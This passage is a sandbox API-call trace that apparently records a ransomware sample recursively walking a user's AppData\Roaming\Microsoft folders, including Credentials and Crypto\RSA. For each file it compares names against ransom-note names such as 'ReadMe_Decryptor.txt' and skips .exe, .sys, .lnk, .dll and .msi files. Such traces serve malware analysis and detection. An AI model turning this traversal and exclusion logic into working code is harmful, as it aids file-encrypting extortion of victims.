dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.170] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.170] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.170] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7c36290, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x7c36290, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x7c36290, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0081.170] FindClose (in: hFindFile=0x708d18 | out: hFindFile=0x708d18) returned 1 [0081.170] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0081.170] lstrcmpW (lpString1="Credentials", lpString2=".") returned 1 [0081.170] lstrcmpW (lpString1="Credentials", lpString2="..") returned 1 [0081.170] lstrlenW (lpString="Credentials") returned 11 [0081.170] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Credentials" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials" [0081.170] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\" [0081.170] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\") returned 68 [0081.170] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x708d18 [0081.170] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.170] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.170] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.170] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.171] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0081.171] FindClose (in: hFindFile=0x708d18 | out: hFindFile=0x708d18) returned 1 [0081.171] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x160a67d7, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Crypto", cAlternateFileName="")) returned 1 [0081.171] lstrcmpW (lpString1="Crypto", lpString2=".") returned 1 [0081.171] lstrcmpW (lpString1="Crypto", lpString2="..") returned 1 [0081.171] lstrlenW (lpString="Crypto") returned 6 [0081.171] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Crypto" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto" [0081.171] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\" [0081.171] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\") returned 63 [0081.171] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x708d18 [0081.172] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.172] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x160a67d7, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.172] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.172] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.172] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x681f1360, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x681f1360, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RSA", cAlternateFileName="")) returned 1 [0081.172] lstrcmpW (lpString1="RSA", lpString2=".") returned 1 [0081.172] lstrcmpW (lpString1="RSA", lpString2="..") returned 1 [0081.172] lstrlenW (lpString="RSA") returned 3 [0081.172] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\", lpString2="RSA" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA" [0081.172] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\" [0081.172] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\") returned 67 [0081.172] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x72a920 [0081.175] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.175] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x681f1360, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x681f1360, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.177] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.177] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.177] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x681f1360, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xa1e34990, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1e34990, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0081.177] lstrcmpW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2=".") returned 1 [0081.178] lstrcmpW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="..") returned 1 [0081.178] lstrlenW (lpString="S-1-5-21-3388679973-3930757225-3770151564-1000") returned 46 [0081.178] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpString2="S-1-5-21-3388679973-3930757225-3770151564-1000" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000" [0081.178] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" [0081.178] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned 114 [0081.178] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x72a960 [0081.185] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.185] FindNextFileW (in: hFindFile=0x72a960, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x681f1360, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xa1e34990, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1e34990, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.187] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.187] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.188] FindNextFileW (in: hFindFile=0x72a960, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xa1e34990, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1e34990, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1e34990, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x2d, dwReserved0=0x0, dwReserved1=0x0, cFileName="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", cAlternateFileName="83AA4C~1")) returned 1 [0081.188] lstrcmpW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2=".") returned 1 [0081.188] lstrcmpW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="..") returned 1 [0081.188] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="ReadMe_Decryptor.txt") returned -1 [0081.188] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="Decryptor_Info.hta") returned -1 [0081.188] PathFindExtensionW (pszPath="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned="" [0081.188] lstrcmpiW (lpString1="", lpString2=".exe") returned -1 [0081.188] lstrcmpiW (lpString1="", lpString2=".sys") returned -1 [0081.188] lstrcmpiW (lpString1="", lpString2=".lnk") returned -1 [0081.188] lstrcmpiW (lpString1="", lpString2=".dll") returned -1 [0081.188] lstrcmpiW (lpString1="", lpString2=".msi") returned -1 [0081.188] FindNextFileW (in: hFindFile=0x72a960, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x681f1360, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x681f1360, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x681f1360, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x57, dwReserved0=0x0, dwReserved1=0x0, cFileName="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", cAlternateFileName="932A2D~1")) returned 1 [0081.188] lstrcmpW (lpString1="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2=".") returned 1 [0081.188] lstrcmpW (lpString1="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="..") returned 1 [0081.188] lstrcmpiW (lpString1="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="ReadMe_Decryptor.txt") returned -1 [0081.188] lstrcmpiW (lpString1="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="Decryptor_Info.hta") returned -1 [0081.188] PathFindExtensionW (pszPath="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned="" [0081.188] lstrcmpiW (lpString1="", lpString2=".exe") returned -1 [0081.188] lstrcmpiW (lpString1="", lpString2=".sys") returned -1 [0081.189] lstrcmpiW (lpString1="", lpString2=".lnk") returned -1 [0081.189] lstrcmpiW (lpString1="", lpString2=".dll") returned -1 [0081.189] lstrcmpiW (lpString1="", lpString2=".msi") returned -1 [0081.189] FindNextFileW (in: hFindFile=0x72a960, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xb0aa1fc0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb0aa1fc0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0aa1fc0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x3d, dwReserved0=0x0, dwReserved1=0x0, cFileName="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", cAlternateFileName="FDA992~1")) returned 1 [0081.189] lstrcmpW (lpString1="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2=".") returned 1 [0081.189] lstrcmpW (lpString1="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="..") returned 1 [0081.189] lstrcmpiW (lpString1="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="ReadMe_Decryptor.txt") returned -1 [0081.189] lstrcmpiW (lpString1="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="Decryptor_Info.hta") returned 1 [0081.189] PathFindExtensionW (pszPath="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned="" [0081.189] lstrcmpiW (lpString1="", lpString2=".exe") returned -1 [0081.189] lstrcmpiW (lpString1="", lpString2=".sys") returned -1 [0081.189] lstrcmpiW (lpString1="", lpString2=".lnk") returned -1 [0081.189] lstrcmpiW (lpString1="", lpString2=".dll") returned -1 [0081.189] lstrcmpiW (lpString1="", lpString2=".msi") returned -1 [0081.189] FindNextFileW (in: hFindFile=0x72a960, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xb0aa1fc0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb0aa1fc0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0aa1fc0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x3d, dwReserved0=0x0, dwReserved1=0x0, cFileName="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", cAlternateFileName="FDA992~1")) returned 0 [0081.189] FindClose (in: hFindFile=0x72a960 | out: hFindFile=0x72a960) returned 1 [0081.191] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xb0aa1fc0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb0aa1fc0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0aa1fc0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x3d, dwReserved0=0x0, dwReserved1=0x0, cFileName="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", cAlternateFileName="FDA992~1")) returned 0 [0081.191] FindClose (in: hFindFile=0x72a920 | out: hFindFile=0x72a920) returned 1 [0081.191] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xb0aa1fc0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb0aa1fc0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0aa1fc0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x3d, dwReserved0=0x0, dwReserved1=0x0, cFileName="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", cAlternateFileName="FDA992~1")) returned 0 [0081.191] FindClose (in: hFindFile=0x708d18 | out: hFindFile=0x708d18) returned 1 [0081.191] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f766d30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4f766d30, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x4f766d30, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Document Building Blocks", cAlternateFileName="DOCUME~1")) returned 1 [0081.192] lstrcmpW (lpString1="Document Building Blocks", lpString2=".") returned 1 [0081.192] lstrcmpW (lpString1="Document Building Blocks", lpString2="..") returned 1 [0081.192] lstrlenW (lpString="Document Building Blocks") returned 24 [0081.192] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Document Building Blocks" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks" [0081.192] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\" [0081.192] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\") returned 81 [0081.192] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x708d18 [0081.193] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.193] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f766d30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4f766d30, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x4f766d30, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.193] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.193] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.193] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f766d30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4f766d30, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x4f766d30, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0081.193] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0081.193] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0081.193] lstrlenW (lpString="1033") returned 4 [0081.193] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\", lpString2="1033" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033" [0081.193] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\" [0081.193] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\") returned 86 [0081.193] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x72a920 [0081.329] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.329] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f766d30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4f766d30, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x4f766d30, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.331] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.331] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.331] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f766d30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4f766d30, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x4f766d30, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="14", cAlternateFileName="")) returned 1 [0081.331] lstrcmpW (lpString1="14", lpString2=".") returned 1 [0081.331] lstrcmpW (lpString1="14", lpString2="..") returned 1 [0081.332] lstrlenW (lpString="14") returned 2 [0081.332] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\", lpString2="14" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14" [0081.332] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\" [0081.332] 